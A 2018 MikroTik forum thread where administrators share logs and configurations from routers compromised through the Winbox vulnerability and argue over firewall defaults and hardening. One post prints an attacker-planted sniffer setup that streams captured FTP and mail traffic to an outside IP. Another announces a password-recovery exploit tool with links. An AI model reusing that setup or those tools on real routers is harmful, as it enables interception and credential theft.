Problem is that of the Dynadishes that are the hard nuts to crack (ie; not responding to Winbox as it's disabled by the hack, http doesn't work enough to get in, ssh and telnet turned off), there's no remote access to work with.
Well, maybe there was MacWinBox access? :)

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 04, 2018 1:48 am
by sunblade
Hello,

Packet sniffer may feed IP 37.1.207.114 with data from attacked router.

[xxx@yyy] /tool sniffer> print
only-headers: no
memory-limit: 100KiB
file-limit: 100KiB
streaming-enabled: yes
streaming-server: 37.1.207.114
filter-stream: yes
filter-interface: all
filter-ip-protocol: tcp,udp
filter-port: ftp-data,ftp,pop3,143,1500,10000



I have found some IP address of machine that was used:

IP: 95.154.216.151

aug/22 21:20:24 system,info,account user admin logged in from 95.154.216.151 via winbox
aug/22 21:20:24 system,info socks acl entry added by admin
aug/22 21:20:24 system,info socks config changed by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:24 system,info new script added by admin
aug/22 21:20:24 system,info,account user admin logged out from 95.154.216.151 via winbox
aug/22 21:20:24 system,info new script scheduled by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info filter rule changed by admin
aug/22 21:20:54 system,info script removed by admin
aug/22 21:20:54 system,info script removed from scheduler by admin
aug/22 21:20:54 system,info script removed by admin
***

IP: 198.100.28.129

aug/28 00:50:48 system,info,account user admin logged in from 198.100.28.129 via ssh
aug/28 00:51:12 system,info item changed by admin
aug/28 00:51:20 system,info item changed by admin
aug/28 00:51:27 system,info item changed by admin
aug/28 00:51:44 system,info,account user admin logged out from 198.100.28.129 via ssh

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 04, 2018 8:05 am
by Jotne
aug/22 21:20:24 system,info socks acl entry added by admin
aug/28 00:51:27 system,info item changed by admin
Think how much easier it would be to debug this if MikroTik logged all commands done on the router.
Please MT do like other network vendor, make all commands visible in the log.
On Cisco you can get it from AAA (Tacacs) that several has requested, or using syslog.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 1:23 am
by rwf
BrianHiggins,
I seemed to find it only on routers running Hotspot.



One interesting thing I noted was that the only routers I found compromised were also routers running additional services or with NAT rules exposing services. I'm guessing they didn't scan for 8291, they instead scanned for something else to build the list of IPs to target. every single router that was otherwise locked down without any services beside 8291 exposed regardless of build number remained uncompromised. Might just be a coincidence, but was worth noting.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 3:04 pm
by indnti
If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 3:25 pm
by normis
If you're curious how the bug works, this article is a good read:
https://n0p.me/winbox-bug-dissection/
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore
There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:15 pm
by blimbach
Currently heise.de writes about attacks on Mikrotik-Devices. Maybe you can correct something on the part of Mikrotik,
because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html

They refer to the following security audit:

https://blog.netlab.360.com/7500-mikrot ... -yours-en/

BR
Boris

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:19 pm
by normis
Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:26 pm
by blimbach
Boris, did you read the first post in this thread? Did you read the blog entry?
https://blog.mikrotik.com/security/winb ... ility.html
Hello Normis, I think I have read and understood all available information. Nevertheless, heise.de reports as if the security fix by mikrotik is at least questionable.

My post was not a complaint. I just wanted to point out this - possibly false - reporting.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:28 pm
by normis
I have contacted them on behalf of MikroTik. Let's see if it helps

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 4:48 pm
by bsiege
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore

There is no new vulnerability, it is all the same old. It is in one of the first sentences of that article.
What's new in 6.42.7 (2018-Aug-17 09:48):
MAJOR CHANGES IN v6.42.7:
----------------------
!) security - fixed vulnerabilities CVE-2018-1156, CVE-2018-1157, CVE-2018-1158, CVE-2018-1159;
----------------------
Normally new flaw = new CVE . Be careful to verify!!

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 5:05 pm
by BartoszP
...
This article respectively the new vulnerability CVE-2018-14847 makes me afraid of using any mikrotik product anymore
I have looked here https://tools.cisco.com/security/center ... nListing.x and I'm wondering who use these products?
And you are lucky if you have software upgrade plan active :-)

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 5:24 pm
by kobuki
Currently heise.de writes about attacks on Mikrotik-Devices. Maybe you can correct something on the part of Mikrotik,
because the news does not sound good.

https://www.heise.de/security/meldung/S ... 55288.html
It looks like a clickbait, smelling pile of misinformational crap. They better fix the bullshitting there.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 05, 2018 5:37 pm
by msatter
I deeply disappointed by Heise to not investigated further for them selves and inquire with Mikrotik. I had high regarded for Heise as a reliable and trustworthy news source.

That they neglected the bugfix version and declared any version below 6.42.x as unsafe. That Heise made this blunder is shocking.

They have now made an update in the news item to correct some errors made by them.

Update: in the update seems that Mikrotik have no love for the bugfixed version because it is not mentioned at all! Be complete in your communications! I keep repeating that.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 2:22 am
by schadom
I deeply disappointed by Heise to not investigated further for them selves and inquire with Mikrotik. I had high regarded for Heise as a reliable and trustworthy news source.

That they neglected the bugfix version and declared any version below 6.42.x as unsafe. That Heise made this blunder is shocking.

They have now made an update in the news item to correct some errors made by them.

Update: in the update seems that Mikrotik have no love for the bugfixed version because it is not mentioned at all! Be complete in your communications! I keep repeating that.

And I'm deeply concerned by the thousands of admins and Mikrotik-customers, which evidently were unable to shield their Winbox, Webfig, Telnet and SSH management ports from the global internet, despite numerous warnings in the forums and wiki. I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default. Additionally red warning messages and confirmation popups ("Are you really sure?") should be added to Winbox/Webfig, for example if someone tries to configure Winbox/Webfig/Telnet/SSH to be reachable from 0.0.0.0/0 instead of a specific host, networks or RFC1918. Also password complexity could be enforced by default.

Unlike other vendors products like Cisco, Juniper, etc., Mikrotik's products are (more or less) targeted towards smaller environments, home setups and CPEs or WISPs, where people often are not even familiar with basic security principles or are just very lazy. While I agree it's not Mikrotik's job to educate those people regarding security, the outcome of people's laziness and lack of knowledge could at some point in the future hit us all very badly - eg. Mirai a few months ago.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:21 am
by msatter
How to warn user of Mikrotik products to update I made already constructive remarks and when they are up to it or are forced to be up to it it will happen.

Let's start small and first get the correct information to the users and seeing today again lacking that in completeness and drive to have all the information out that informs users in a way that they don't get the impression that it is inaccurate and that the information by Mikrotik is not taken serious any more. The result is there to see and in the news and not only with Heise.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 10:51 am
by mrz
I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 11:28 am
by mkx
I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading say 6-year old RBs. FW rules don't get updated even if user never touched those. And 6-year old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults in ROS exist.

Another problem is when user installs ipv6 package. Firewall list is empty unless one resets whole configuration. Which is a nuisance (backup is no good, export config should be done, configuration has to be reset and exported config imported again) and user has to be aware of this. It would be much better if in this case, ipv6 config should be reset to ROS defaults upon installation of package (old config is non-existant in this case).

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 3:07 pm
by Deantwo
I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading say 6-year old RBs. FW rules don't get updated even if user never touched those. And 6-year old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults in ROS exist.
6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 3:18 pm
by mrz
unless they have a time machine (and you guys don't, right?).
We are working on it.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:27 pm
by mkx
6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
@Deantwo: you largely misinterpreted what I wrote in my post.

The biggest problem about recently (well, in the last two years or so) vulnerabilities in ROS is that old default settings did not rigorously close all WAN access to RB. And then most of users (apart from small number of professionals and not even all professionals) don't upgrade ROS regularly. And even if they do, they expect that this is enough, but now we know that old FW rules are not good enough. Vast majority of users (quite a few "professionals" included) are too ignorant to grasp the need for constant improving of their setup (don't fix it if it ain't broken). Most home users don't have spare RB (of the exactly the same type to make the transition bearable) so that they can reset config, configure from scratch and put in production.

It just doesn't work for crowd, the same crowd that will probably never upgrade ROS anyway and because of the same crowd articles about masively compromised routerboards will pop-up in the press for quite some future ...

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:47 pm
by normis
ROS is that old default settings
That is not correct. Since beginning of default firewall, it protects the default wan port. The issue is that some people want to make VPN in their home router, so they turn off the firewall.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:49 pm
by sid5632
unless they have a time machine (and you guys don't, right?).
We are working on it.
Yeah, but when will it be released?
1985?

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 4:50 pm
by mrz
Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 06, 2018 6:08 pm
by Deantwo
Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.
Yeah, if a guide starts by saying "remove the default configuration", you likely need to rethink your choice of configuration guide.

The manual's guide on securing your router taught me a thing or two as well. Very useful.
See: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

Re: Winbox vulnerability: please upgrade

Posted: Fri Sep 07, 2018 1:37 am
by schadom
Actually old firewall protected router just fine. Users ef-ed up configuration and did not adjust firewall accordingly.
Of course we will think about improvements, but there will always be the case when somebody change something and complain that router is not secure.

Thanks mrz for all your efforts in making the web more secure.
Here are some suggestions in unsorted order:

- Secure hashing of passwords in .idx files (scrypt, bcrypt, pbkdf2 or at least sha-3)
- Password complexity requirements setting which is enabled and enforced by default
- Warning messages and double-confirmations for enabling access from 0.0.0.0/0
- Bruteforce prevention & temporary lockout for all management ports by default
- Notifications in Winbox or on Winbox startup for criticial security updates
- A security announcement mailinglist would be very useful
- Automatic security updates (manual opt-in for SoHo devices)

Re: Winbox vulnerability: please upgrade

Posted: Fri Sep 07, 2018 8:41 am
by macgaiver
I just recently remembered that i gave MT router to my far relatives, i pre-configured it with just winbox access, it was year ago, just got IP to connect to and this is what i see:
Jul/28/2018 08:12:46 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Jul/28/2018 08:12:46 system,info socks config changed by macgaiver
Jul/28/2018 08:12:47 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info new script added by macgaiver
Jul/28/2018 08:12:48 system,info new script scheduled by macgaiver
Jul/28/2018 08:12:48 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver

Aug/05/2018 11:31:15 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info socks acl entry added by macgaiver
Aug/05/2018 11:31:16 system,info socks config changed by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver

Aug/19/2018 23:22:47 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info socks acl entry added by macgaiver
Aug/19/2018 23:22:47 system,info socks config changed by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver

Sep/03/2018 23:03:03 system,info,account user macgaiver logged in from 109.172.76.49 via winbox
Sep/03/2018 23:03:07 system,info,account user macgaiver logged in from 109.172.76.49 via telnet
Sep/03/2018 23:03:11 system,info ip service changed by macgaiver
Sep/03/2018 23:03:13 system,info ip service changed by macgaiver
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via winbox
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via telnet
Sep/03/2018 23:03:16 system,info,account user macgaiver logged in from 159.224.52.96 via api
Sep/03/2018 23:03:20 system,info socks config changed by macgaiver
Sep/03/2018 23:03:21 system,info dns changed by macgaiver
Sep/03/2018 23:03:21 system,info item changed by macgaiver
Sep/03/2018 23:03:23 system,info script removed by macgaiver
Sep/03/2018 23:03:24 system,info script removed from scheduler by macgaiver
Sep/03/2018 23:03:25 system,info socks config changed by macgaiver
Sep/03/2018 23:03:26 system,info http proxy settings changed by macgaiver
Sep/03/2018 23:03:37 wireless,info 60:A4:D0:05:67:CB@wlan1: disconnected, disabling
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:43 system,info verified routeros-mipsbe-6.42.7.npk
Sep/03/2018 23:03:43 system,info installed routeros-mipsbe-6.42.7
Sep/03/2018 23:03:44 system,info router rebooted

non of them was me :), including last one that cleared everything up and upgraded the router (thanks, to whomever that was)

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 1:01 pm
by msatter
Our Dutch Prime Minister has also a driver license made in Poland on his name.

Darn the advertisement is removed.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 1:13 pm
by BartoszP
@msatter: Is it joke or not?

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 6:47 pm
by wpeople
May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 9:06 pm
by 43north
May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
I have understood that even if you limit the connections in the IP/Services to specific addresses that it still allows the attacker close enough to execute the exploit. I have created firewall rules for the default 8291 and also for the port that I changed my Winbox access to. This is the only sure way in my mind that they won't be able to even reach IP/Services.

Anyone please correct me if I am wrong on these points.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 9:11 pm
by msatter
@msatter: Is it joke or not?
https://www.rdw.nl/particulier/nieuws/2 ... -rijbewijs

The internet is full of news items about Rutte rijbewijs

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 10:08 am
by Deantwo
May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possibly.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 12:08 pm
by wpeople
May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possibly.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my ip prefixes, how the hell he can control my device?!
The only way is this possible, if Mikrotik made the service check connecting IP address AFTER authentication.

If the services does NOT allow connection from anybut but listed IPs, the packets from unlisted source should not access the application. I think.
Please fixme, or accept that there is another piece of sh!t found in the pancake...

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 1:20 pm
by normis
Did you always have the IP SERVICES limitation? The hack could have happened last year. Is it correctly set up, and was it always?

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 1:27 pm
by wpeople
Yes! 95% of those routers had ip/services limitation since installation! (other 5% is customer radio turned to router from bridge, due customer router issue)

90% of those 95% devices has remote syslog as well - but momentary had no time to lookup them. probably i will found something, becuase hacker set logging limit to 1 line :-)

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 1:30 pm
by normis
How about possibility of a staff member, that used the attack script from the allowed IP range?
IP services works well, there is zero evidence that this limit can be overcome in some way.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 2:36 pm
by Deantwo
May i ask, how is it possible to attacker to load up the know scripts and modify firewall, sock proxy, etc.
if in IP/Services only winbox and ssh is allowed,but they are limited to connect from known prefixes?

It's even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possibly.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my ip prefixes, how the hell he can control my device?!
The only way is this possible, if Mikrotik made the service check connecting IP address AFTER authentication.

If the services does NOT allow connection from anybut but listed IPs, the packets from unlisted source should not access the application. I think.
Please fixme, or accept that there is another piece of sh!t found in the pancake...
Check your logs to see where the attacker accessed from, it could be a compromised machine from a trusted IP-address range. We can't really help you here without more information.

Maybe better if you make a new thread and post your configuration (passwords and IPs obscured of course) so we can see what might be wrong and help you there. Instead of polluting this thread with baseless accusations and misinformation.

I would however suggest to email support@mikrotik.com, since if it is a real issue then they can escalate it to the right department. This would however not satisfy my curiosity.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 2:45 pm
by macgaiver
in some cases it was reported that device got infected from other infected device from the same (trusted) network.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 6:09 pm
by tiktakmik
CHR was hacked. I got new password from disk image and password recovery tools.
Now i change hacker's configuration, remove socks, change password again, but didn't clear disk image and license.

See screenshot of winbox interface : http://prntscr.com/kt6f9y


1 . Whis is this "job" on image? It is hacker's job, or system (like osfp)?
There is no such task in the my usual configuration

here is full export command (little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_Sremote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Can hackers also put backdoors to linux?

2. How I can I reinstall CHR license on new disk image?

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 8:06 pm
by Deantwo
here is full export command (little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_Sremote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Yeah, that configuration is not secure. Wide open to the internet and attackers.
At least missing a couple block rules in the firewall filter. For example:
/ip firewall filter
add action=accept chain=forward in-interface=ether1 connection-state=established,related
add action=accept chain=input in-interface=ether1 connection-state=established,related
add action=drop chain=forward in-interface=ether1
add action=drop chain=input in-interface=ether1
But suggest you read the manual page about securing your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
Can hackers also put backdoors to linux?
No they can not access the linux operating system of the router, unless you have rooted the router yourself already. Which you really should not do.
Unless you were running a version of RouterOS that is older than v6.38.5, see: viewtopic.php?f=21&t=132499
2. How I can I reinstall CHR license on new disk image?
I suggest you email support@mikrotik.com with your license issue.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 10:16 pm
by tiktakmik
Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
What about my question? who starts this job?
2. How I can I reinstall CHR license on new disk image?

I suggest you email support@mikrotik.com with your license issue.
I haven't access to email or account. Only disk image with self-updated license.
Any other suggestion?

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 11:01 pm
by Deantwo
2. How I can I reinstall CHR license on new disk image?
I suggest you email support@mikrotik.com with your license issue.
I haven't access to email or account. Only disk image with self-updated license.
Any other suggestion?
Email support@mikrotik.com, they can help you with all your questions.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 11:20 pm
by djradiator
Hello everybody,

If somebody will need, I just created a Windows App for showing passwords for impacted MK versions based on the original Python script (https://github.com/BasuCert/WinboxPoC):
https://github.com/msterusky/WinboxExploit/releases

It's a one-time application, and don't plan any extensions and next versions.
The app doesn't contain an implementation with mac-winbox, and works only on IP layer.

Please, feel free to reuse it or adjust as you need.


Thanks,
Martin

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 1:37 am
by sid5632
Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
You got hacked and started asking questions. Then when someone gives you a sensible answer and tells you where you went wrong, you disagree with them and stick your head in the sand.
You ARE a fool.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 9:36 am
by tiktakmik

You ARE a fool.
If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.


Just answer me, what kind of job is running on this configuration?

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 9:40 am
by normis
Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:03 am
by Deantwo
If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.
Even better reason to have it secure, and a plan for how to access it remotely when you finally do secure it correctly.
The manual page I linked you to has examples on how to do all of that. I urge you to give it a read if you haven't already, but even so reading it again is a good idea. I might need to read it all again myself.
Just answer me, what kind of job is running on this configuration?
From the picture and config you supplied us, we can't tell you.
That is why I told you to email support@mikrotik.com instead. Maybe they can see what it is doing if you make a supout?

I guess that it could be an infinity looped mischievous script that wakes up every specific interval and changes the configuration somehow or sends out mischievous traffic. The log could give some hints as to what it is doing, or maybe the System->History.
